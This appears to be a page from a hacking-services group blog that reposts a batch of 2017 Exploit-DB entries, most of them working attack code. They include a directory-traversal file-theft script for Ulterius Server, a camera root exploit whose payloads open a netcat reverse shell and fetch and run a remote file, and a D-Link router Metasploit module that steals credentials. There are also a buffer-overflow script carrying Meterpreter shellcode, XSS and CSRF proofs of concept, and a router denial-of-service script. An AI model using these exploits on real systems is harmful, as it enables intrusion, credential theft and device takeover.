# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access
# Date: 11/13/2017
# Exploit Author: Rick Osgood
# Vendor Homepage: https://ulterius.io/
# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d
# Version: < 1.9.5.0
# Tested on: Windows Server 2012 R2
# CVE : CVE-2017-16806
#
# You can download almost any file that resides on the same drive letter as Ulterius server.
# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini
#
# Unfortunately, you need to know the path to the file you want to download.
# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:
# http://ulteriusURL:2206/.../fileIndex.db
#
# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to
# make it human readable. Then you can use the same script to download any juicy files you find.
#
# Ulterius writes the following to the fileIndex.db file:
# First four bytes are a timestamp so we can ignore this
# The next four items repeat until the end of the file:
# filename.length (4 bytes?)
# filename
# directory.length (4 bytes?)
# directory
import requests
import sys
import argparse
import zlib
import struct
# This function grabs the filename or file path from the fileIndex
def processChunk(i, data):
length = struct.unpack('B', data[i])[0]
length += struct.unpack('B', data[i+1])[0]
length += struct.unpack('B', data[i+2])[0]
length += struct.unpack('B', data[i+3])[0]
i += 4
filename = data[i:i+length]
i += length
return i, filename
# Main function
def main():
# Parse arguments
parser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')
parser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')
parser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\windows\win.ini)')
parser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')
args = parser.parse_args()
# We are going to retrieve a specified file
if args.retrieve:
fileName = str(args.retrieve[0])
# This works for the default Ulterius install directory.
baseDir = "/.../.../.../.../.../.../.../.../.../"
# Remove slashes from output file name
outFile = fileName.replace('\\','_')
# Remove drive letter and change slashes
if ":\\" in fileName[:3]:
fileName = fileName[3:]
# Replace slashes
fileName = fileName.replace('\\','/') # Replace slashes
# Build URL
url = str(args.url[0]) + baseDir + fileName
print "Retrieving " + url
# Download file
r = requests.get(url=url, stream=True) # Retrieve file
# Write file
f = open(outFile, 'w')
f.write(r.content)
# We are going to download the fileIndex.db file
if args.index:
# Setup the URL
url = args.url[0] + "/.../fileIndex.db"
print "Downloading " + url
# Download file
r = requests.get(url=url, stream=True)
# decompress the data
data = zlib.decompress( r.content, -15 )
# Open output file for writing
f = open('fileIndex.db', 'w')
# Strip off header info (not sure what this is)
data = data[8:]
# Process file names and write to output file
i = 0
while i < len(data):
i, filename = processChunk(i, data) # Get file name
i, directory = processChunk(i, data) # Get file path
i += 8 # Skip the FFFFFFFFFFFFFFFF
f.write(directory + '\\' + filename + '\n') # Write to output file
if __name__ == "__main__":
main()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147299
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
// Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c
// Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define CAM_PORT 80
#define REMOTE_HOST "192.168.1.1"
#define REMOTE_PORT "1337"
#define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
#define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
char * creds(char *argv,
int get_config);
int rce(char *argv,
char *id,
char attack[],
char desc[]);
int main(int argc,
char **argv,
char **envp)
{
char *id;
printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");
if (argc < 2)
{
printf("%s target\n", argv[0]);
printf("%s target --get-config will dump the configuration and exit\n", argv[0]);
return (1);
}
if (argc == 2)
printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);
if (argc == 3 && !strcmp(argv[2], "--get-config"))
id = creds(argv[1], 1);
else
id = creds(argv[1], 0);
if (id == NULL)
{
printf("exploit failed\n");
return (1);
}
printf("done\n");
printf(" login = %s\n", id);
printf(" pass = %s\n", id + 32);
if (!rce(argv[1], id, PAYLOAD_0, "planting"))
printf("done\n");
sleep(1);
if (!rce(argv[1], id, PAYLOAD_1, "executing"))
printf("done\n");
if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
printf("done\n");
if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
printf("done\n");
printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);
return (0);
}
char * creds(char *argv,
int get_config)
{
int sock;
int n;
struct sockaddr_in serv_addr;
char buf[8192] = { 0 };
char *out;
char *tmp;
char payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
int old_n;
int n_total;
sock = 0;
n = 0;
old_n = 0;
n_total = 0;
printf("[+] bypassing auth ... ");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error while creating socket\n");
return (NULL);
}
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(CAM_PORT);
if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
{
printf("Error while inet_pton\n");
return (NULL);
}
if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
{
printf("creds: connect failed\n");
return (NULL);
}
if (send(sock, payload, strlen(payload) , 0) < 0)
{
printf("creds: send failed\n");
return (NULL);
}
if (!(tmp = malloc(10 * 1024 * sizeof(char))))
return (NULL);
if (!(out = calloc(64, sizeof(char))))
return (NULL);
while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
{
n_total += n;
if (n_total < 1024 * 10)
memcpy(tmp + old_n, buf, n);
if (n >= 0)
old_n = n;
}
close(sock);
/*
[ HTTP HEADERS ]
...
000????: 0000 0a0a 0a0a 01.. .... .... .... ....
^^^^ ^^^^ ^^
Useful reference in the binary data
in order to to find the positions of
credentials
...
...
0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
...
NOTE: reference can be too:
000????: 0006 0606 0606 0100 000a .... .... ....
Other method: parse everything, find the "admin" string and extract the associated password
by adding 31bytes after the address of 'a'[dmin].
Works if the login is admin (seems to be this by default, but can be changed by the user)
*/
if (get_config)
{
for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
printf("%c", tmp[j]);
exit (0);
}
for (unsigned int j = 50; j < 10 * 1024; j++)
{
if (tmp[j - 4] == 0x0a &&
tmp[j - 3] == 0x0a &&
tmp[j - 2] == 0x0a &&
tmp[j - 1] == 0x0a &&
tmp[j] == 0x01)
{
if (j + 170 < 10 * 1024)
{
strcat(out, &tmp[j + 138]);
strcat(out + 32 * sizeof(char), &tmp[j + 170]);
free(tmp);
return (out);
}
}
}
free(tmp);
return (NULL);
}
int rce(char *argv,
char *id,
char attack[],
char desc[])
{
int sock;
struct sockaddr_in serv_addr;
char *payload;
if (!(payload = calloc(512, sizeof(char))))
return (1);
sock = 0;
printf("[+] %s payload ... ", desc);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error while creating socket\n");
return (1);
}
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(CAM_PORT);
if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
{
printf("Error while inet_pton\n");
return (1);
}
if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
{
printf("rce: connect failed\n");
return (1);
}
sprintf(payload, attack, id, id + 32);
if (send(sock, payload, strlen(payload) , 0) < 0)
{
printf("rce: send failed\n");
return (1);
}
return (0);
}
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DIR-850L (Un)authenticated OS Command Exec',
'Description' => %q{
This module leverages an unauthenticated credential disclosure
vulnerability to then execute arbitrary commands on DIR-850L routers
as an authenticated user. Unable to use Meterpreter payloads.
},
'Author' => [
'Mumbai', # https://github.com/realoriginal (module)
'Zdenda' # vuln discovery
],
'References' => [
['URL', 'https://www.seebug.org/vuldb/ssvid-96333'],
['URL', 'https://blogs.securiteam.com/index.php/archives/3310'],
],
'DisclosureDate' => 'Aug 9 2017',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp'
},
'Privileged' => true,
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
end
def check
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res && res.headers['Server']
auth = res.headers['Server']
if auth =~ /DIR-850L/
if auth =~ /WEBACCESS\/1\.0/
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Detected
end
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
# some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well...
# should write an auxiliary module to-do -> WRITE AUXILIARY
def retrieve_creds
begin
xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
xml << "<postxml>\r\n"
xml << "<module>\r\n"
xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
xml << "</module>\r\n"
xml << "</postxml>"
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'encode_params' => false,
'headers' => {
'Accept-Encoding' => 'gzip, deflate',
'Accept' => '*/*'
},
'ctype' => 'text/xml',
'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}",
'data' => xml,
})
if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue
parse = res.get_xml_document
username = parse.at('//name').text
password = parse.at('//password').text
vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
print_good("#{peer} - Downloaded credentials to #{loot}")
return username, password
else
fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def retrieve_uid
begin
res = send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'GET',
})
parse = res.get_json_document
uid = parse['uid']
challenge = parse['challenge']
return uid, challenge
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def login(username, password)
uid, challenge = retrieve_uid
begin
hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'POST',
'data' => "id=#{username}&password=#{hash}",
'cookie' => "uid=#{uid}"
})
return uid
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def execute_command(cmd, opts)
uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
payload << "<postxml>\r\n"
payload << "<module>\r\n"
payload << " <service>DEVICE.TIME</service>\r\n"
payload << " <device>\r\n"
payload << " <time>\r\n"
payload << " <ntp>\r\n"
payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n"
payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n"
payload << " </ntp>\r\n"
payload << " <ntp6>\r\n"
payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n"
payload << " </ntp6>\r\n"
payload << " <timezone>20</timezone>\r\n"
payload << " <time/>\r\n"
payload << " <date/>\r\n"
payload << " <dst>0</dst>\r\n"
payload << " <dstmanual/>\r\n"
payload << " <dstoffset/>\r\n"
payload << " </time>\r\n"
payload << " </device>\r\n"
payload << "</module>\r\n"
payload << "</postxml>"
begin
# save configuration
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'ctype' => 'text/xml',
'data' => payload,
'cookie' => "uid=#{uid}"
})
# execute configuration
res = send_request_cgi({
'uri' => '/pigwidgeon.cgi',
'method' => 'POST',
'data' => 'ACTIONS=SETCFG,ACTIVATE',
'cookie' => "uid=#{uid}"
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def exploit
print_status("#{peer} - Connecting to target...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
end
#
# Information Retrieval, obtains creds and logs in
#
@username, @password = retrieve_creds
execute_cmdstager(
:flavor => :wget,
:linemax => 200
)
end
end
X41 D-Sec GmbH Security Advisory: X41-2017-006
Multiple Vulnerabilities in PSFTPd Windows FTP Server
=====================================================
Overview
--------
Confirmed Affected Versions: 10.0.4 Build 729
Confirmed Patched Versions: None
Vendor: Sergei Pleis Softwareentwicklung
Vendor URL: http://www.psftp.de/ftp-server/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-006-psftpd/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to hide
information in log files, recover passwords and crash the whole server.
It uses neither ASLR nor DEP to make exploitation harder.
Product Description
-------------------
From the vendor page, roughly translated:
PSFTPd is a userfriendly, functional and robust FTP server software with
support for FTP, FTPS and SFTP.
Use after free
==============
Severity Rating: High
Vector: Network
CVE: CVE-2017-15271
CWE: 416
CVSS Score: 7.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary and Impact
------------------
An invalid memory access issue could be triggered remotely in the SFTP
component of PSFTPd. This issue could be triggered prior authentication.
The PSFTPd server did not automatically restart, which enabled attackers
to perform a very effective DoS attack against this service. By sending
the following SSH identification / version string to the server, a NULL
pointer dereference could be triggered:
$ cat tmp.14
SSH-2.0-BBBBBBBB
CCCCCCCCCCCC
$ cat tmp.14 | socat - TCP:192.168.122.50:22
The issue appears to be a race condition in the window message handling,
performing the cleanup for invalid connections. Upon further
investigation X41 D-Sec GmbH could confirm that the accessed memory was
already freed.
X41 D-Sec GmbH enabled the memory debugging functionality page heap for
the psftpd_svc.exe exeutable using the command agflags.exe /p /disable
psftpd_svc.exe /fulla. When observing the crash in the WinDBG 19
debugging tool, it could be confirmed that access to an already freed
page was taking place.
Log Injection
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15270
CWE: 117
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Summary and Impact
------------------
The PSFTPd server does not properly escape data before writing it into a
Comma Separated Values (CSV) file. This can be used by attackers to hide
data in the Graphical User Interface (GUI) view and create arbitrary
entries to a certain extent.
Special characters as '"', ',' and '\r' are not escaped and can be used
to add new entries to the log.
Workarounds
-----------
None
Passwords stored in Plain Text
==============================
Severity Rating: Low
Vector: Local
CVE: CVE-2017-15272
CWE: 312
CVSS Score: 3.3
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The PSFTPd server stores its configuration inside the PSFTPd.dat. This
file is a Microsoft Access Database and can be extracted by using the
command "mdb-export PSFTPd.dat USERS" from mdbtools
(https://github.com/brianb/mdbtools). The application sets the encrypt
flag with the password "ITsILLEGAL", but this is not required to extract
the data.
The users password is shown in clear text, since it is not stored securely.
Workarounds
-----------
Use the Active Directory connector for your users.
FTP Bounce Scan
===============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15269
CWE: 441
CVSS Score: 5.0
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Summary and Impact
------------------
The PSFTPd server does not prevent FTP bounce scans by default.
These can be performed using "nmap -b" and allow to perform scans via
the FTP server.
Workarounds
-----------
It is possible to prevent FTP bounce scans by setting: Kontrollmanager >
Domain > Sicherheit > Register "FTP Bounce and FXP"
Workarounds
-----------
None
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-08-31 Issues found
2017-09-18 Vendor contacted
2017-09-19 Vendor reply
2017-10-11 CVE IDs requested
2017-10-11 CVE IDs assigned
2017-11-06 Vendor informed us, that apparently a fixed version was
released. We cannot confirm, since we do not have
access.
2017-11-07 Public release
# Tested on Windows 10 (x86)
# The application requires to have the web server enabled.
# Exploit for older version: https://www.exploit-db.com/exploits/40832/
#!/usr/bin/python
import socket,os,time,struct,argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()
host = args.host
port = 80
# root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.116.166 LPORT=4455 -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
shellcode = ""
shellcode += "\xba\xb6\x9f\x39\x88\xd9\xf7\xd9\x74\x24\xf4\x5e\x31"
shellcode += "\xc9\xb1\x54\x83\xee\xfc\x31\x56\x0f\x03\x56\xb9\x7d"
shellcode += "\xcc\x74\x2d\x03\x2f\x85\xad\x64\xb9\x60\x9c\xa4\xdd"
shellcode += "\xe1\x8e\x14\x95\xa4\x22\xde\xfb\x5c\xb1\x92\xd3\x53"
shellcode += "\x72\x18\x02\x5d\x83\x31\x76\xfc\x07\x48\xab\xde\x36"
shellcode += "\x83\xbe\x1f\x7f\xfe\x33\x4d\x28\x74\xe1\x62\x5d\xc0"
shellcode += "\x3a\x08\x2d\xc4\x3a\xed\xe5\xe7\x6b\xa0\x7e\xbe\xab"
shellcode += "\x42\x53\xca\xe5\x5c\xb0\xf7\xbc\xd7\x02\x83\x3e\x3e"
shellcode += "\x5b\x6c\xec\x7f\x54\x9f\xec\xb8\x52\x40\x9b\xb0\xa1"
shellcode += "\xfd\x9c\x06\xd8\xd9\x29\x9d\x7a\xa9\x8a\x79\x7b\x7e"
shellcode += "\x4c\x09\x77\xcb\x1a\x55\x9b\xca\xcf\xed\xa7\x47\xee"
shellcode += "\x21\x2e\x13\xd5\xe5\x6b\xc7\x74\xbf\xd1\xa6\x89\xdf"
shellcode += "\xba\x17\x2c\xab\x56\x43\x5d\xf6\x3e\xa0\x6c\x09\xbe"
shellcode += "\xae\xe7\x7a\x8c\x71\x5c\x15\xbc\xfa\x7a\xe2\xc3\xd0"
shellcode += "\x3b\x7c\x3a\xdb\x3b\x54\xf8\x8f\x6b\xce\x29\xb0\xe7"
shellcode += "\x0e\xd6\x65\x9d\x04\x40\x2a\x72\x6d\x36\x5a\x71\x8d"
shellcode += "\x27\xfc\xfc\x6b\x17\x52\xaf\x23\xd7\x02\x0f\x94\xbf"
shellcode += "\x48\x80\xcb\xdf\x72\x4a\x64\x75\x9d\x23\xdc\xe1\x04"
shellcode += "\x6e\x96\x90\xc9\xa4\xd2\x92\x42\x4d\x22\x5c\xa3\x24"
shellcode += "\x30\x88\xd2\xc6\xc8\x48\x7f\xc7\xa2\x4c\x29\x90\x5a"
shellcode += "\x4e\x0c\xd6\xc4\xb1\x7b\x64\x02\x4d\xfa\x5d\x78\x7b"
shellcode += "\x68\xe2\x16\x83\x7c\xe2\xe6\xd5\x16\xe2\x8e\x81\x42"
shellcode += "\xb1\xab\xce\x5e\xa5\x67\x5a\x61\x9c\xd4\xcd\x09\x22"
shellcode += "\x02\x39\x96\xdd\x61\x3a\xd1\x22\xf7\x1e\x7a\x4b\x07"
shellcode += "\x1e\x7a\x8b\x6d\x9e\x2a\xe3\x7a\xb1\xc5\xc3\x83\x18"
shellcode += "\x8e\x4b\x09\xcc\x7c\xed\x0e\xc5\x21\xb3\x0f\xe9\xf9"
shellcode += "\xa2\x81\x0e\xfe\xca\x63\x33\x28\xf3\x11\x74\xe8\x40"
shellcode += "\x29\xcf\x4d\xe0\xa0\x2f\xc1\xf2\xe0"
buffer = "\x41" * 780
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "\x90" * 12
buffer += shellcode
buffer += "\x90" * (10000 - len(buffer))
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.228.140\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=" + buffer
evil += "&password=" + buffer + "\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
LanSweeper - Cross Site Scripting and HTMLi
Title: Vulnerability in LanSweeper
Date: 16-11-2017
Status: Vendor contacted, patch available
Author: Miguel Mendez Z
Vendor Homepage: http://www.lansweeper.com
Version: 6.0.100.75
CVE: CVE-2017-16841
Vulnerability description -------------------------
LanSweeper 6.0.100.75 has XSS via the description parameter to "/Calendar/CalendarActions.aspx".
Take control of the browser using the xss shell or perform malware attacks on users.
Vulnerable variable:
--------------------
"http://victim.com/Calendar/CalendarActions.aspx?action=scheduleinfo&id=2&__VIEWSTATE=&title=Test+Lansweeper&description=XSS/HTMLI&type=1&startdate=13/10/2017&txtStart=19:30&enddate=13/10/2017&txtEnd=21:30&reminder=15&repeattype=1&amount=1&repeatby=0&monthday=1&monthweekday=1&monthweekdayday=1&ends=1&occurrences=15&repeatenddate=&agents={"14":{"id":14,"editAllowed":true}}&teams=&delete=false"
"http://victim.com/Scanning/report.aspx?det=web50accessdeniederrors&title=XSS/HTMLI"
"http://victim.com/Software/report.aspx?det=XSS/HTMLI&title=Linux Software"
Poc:
----
https://www.youtube.com/watch?v=u213EqTSsXQ
# Exploit Title: [D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability]
# Date: [26/03/2017]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [http://us.dlink.com/product-category/home-solutions/view/network-cameras/]
# Version: [Tested on DCS-936L with firmware version 1.03. Other versions/models are also be affected]
# Tested on: [DCS-936L with firmware version 1.02.01]
# CVE : [CVE-2017-7851]
==================
#Product:-
==================
Small and unobtrusive, SecuriCam™ IP surveillance solutions from D-Link allow you to monitor your offices or warehouses from anywhere - at anytime. Extreme Low LUX optics, 2 way audio, and full pan/tilt/zoom manipulation provide everything an SMB needs to safeguard their valuable resources.
==================
#Vulnerability:-
==================
D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability.
========================
#Vulnerability Details:-
========================
=============================================================================================================================
D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability (CVE-2017-7851)
=============================================================================================================================
D-Link DCS-936L devices with firmware 1.02.01 have CSRF. If a victim is logged into the camera's web console and visits a malicious site hosting a <Target_Device_IP.HTML> from another tab in the same browser, the malicious site can send requests to the victim's device. An attacker can add a new user, replace the firmware image with a malicious one, or connect the victim's device to a rogue Wireless Network.
An attacker can easily find out public IP address of victim's device on Shodan or similar search engines to create <Target_Device_IP.HTML> file. Victim must be logged into the camera's web console and visit attacker's site from another tab in the same browser.
#Proof-of-Concept:-
-------------------
D-Link DCS-936L prevents CSRF attack by looking at ‘Referer’ header. The ‘Referer’ IP should match with the one in ‘HOST’ header. If it does not, HTTP 403 is returned in the response. However, this device does not perform a strict check on ‘Referer’ header. It seems that it looks for the device’s IP address (which is the one in ‘HOST’ header) anywhere in the ‘Referer’ header. If found, it happily accepts the request.
An unauthenticated, remote attacker could host a malicious site that makes requests to the victim’s device without having credentials. In a targeted attack, an attacker needs to trick victim to visit a malicious site that exploits this vulnerability.
1. Attacker hosts a ‘<target_ip>.html’ on <attacking_ip>
<html>
<body>
<form id="CSRF" action="http://<target_ip>/eng/admin/tools_admin.cgi" method="POST">
<input type="hidden" name="user" value="hacker">
<input type="hidden" name="action" value="set">
<input type="hidden" name="password" value="abc123">
<input type="hidden" name="confirmPassword" value="abc123">
</form>
<script>
window.onload = function(){
document.forms['CSRF'].submit()
}
</script>
</body>
</html>
2. Victim logs into his device.
3. Victim then visits attackers site http://<attacking_ip>/<target_ip>.html
4. Above request adds a new user ‘Hacker’ which reboots the web server.
6. Browser sends add new user request to the target device <target_ip>. Victim's browser sets 'Referer' header to 'http://<attacking_ip>/<target_ip>.html'. As this contains the IP address of the device (<target_ip>), this request is processed successfully.
7. Server response shows user hacker added successfully:
8. Attacker can now log into the device as hacker/abc123
===================================
#Vulnerability Disclosure Timeline:
===================================
26/03/2017: First email to disclose vulnerability to D-Link incident response team.
26/03/2017: Vendor acknowledged the report.
25/05/2017: Vendor confirmed that development has been completed and it's undergoing security audit.
13/10/2017: Firmwared released to production: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_FIRMWARE_v1.05.07.zip
13/11/2017: DCS-936L Firmware Release Notes: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_RELEASE_NOTES_v1.05.07.pdf
15/11/2017: Published CVE-2017-7851
# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1
if [ "$#" -ne 1 ]; then
echo "usage: $0 <router_ip>"
exit
fi
curl http://$ROUTER/Tools/
# Exploit Title: XSS Vuln - TP-LINK TL-WR740N
# Date: 15/11/2017
# Exploit Author: bl00dy
# Vendor Homepage: http://www.tp-link.com <http://www.tp-link.com.br/>
# Version: TP-LINK TL-WR740N - 3.17.0 Build 140520 Rel.75075n
# Tested on: Windows 8.1
Cross-site scripting (XSS) in TP-LINK TL-WR740N
______________________________________________________
Proof of Concept:
1. Go to your wireless router ip (ex. 192.168.0.1)
2. Go to Wireless and -Wireless MAC Filtering- tab
3. Click Add new button
5.Write random MAC Address and in -Description- write (<h1>XSS by
bl00dy</h1>)
6.Click save and you will see XSS in Wireless MAC Filtering tab
______________________________________________________
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1339
I accidentally found this while trying to reproduce another bug in Edge.
Failed to reproduce on Microsoft Edge 38.14393.1066.0, Microsoft EdgeHTML 14.14393.
Tested on Microsoft Edge 40.15063.0.0, Microsoft EdgeHTML 15.15063 (Insider Preview).
Crash Log:
First chance exceptions are reported before any exception handling.
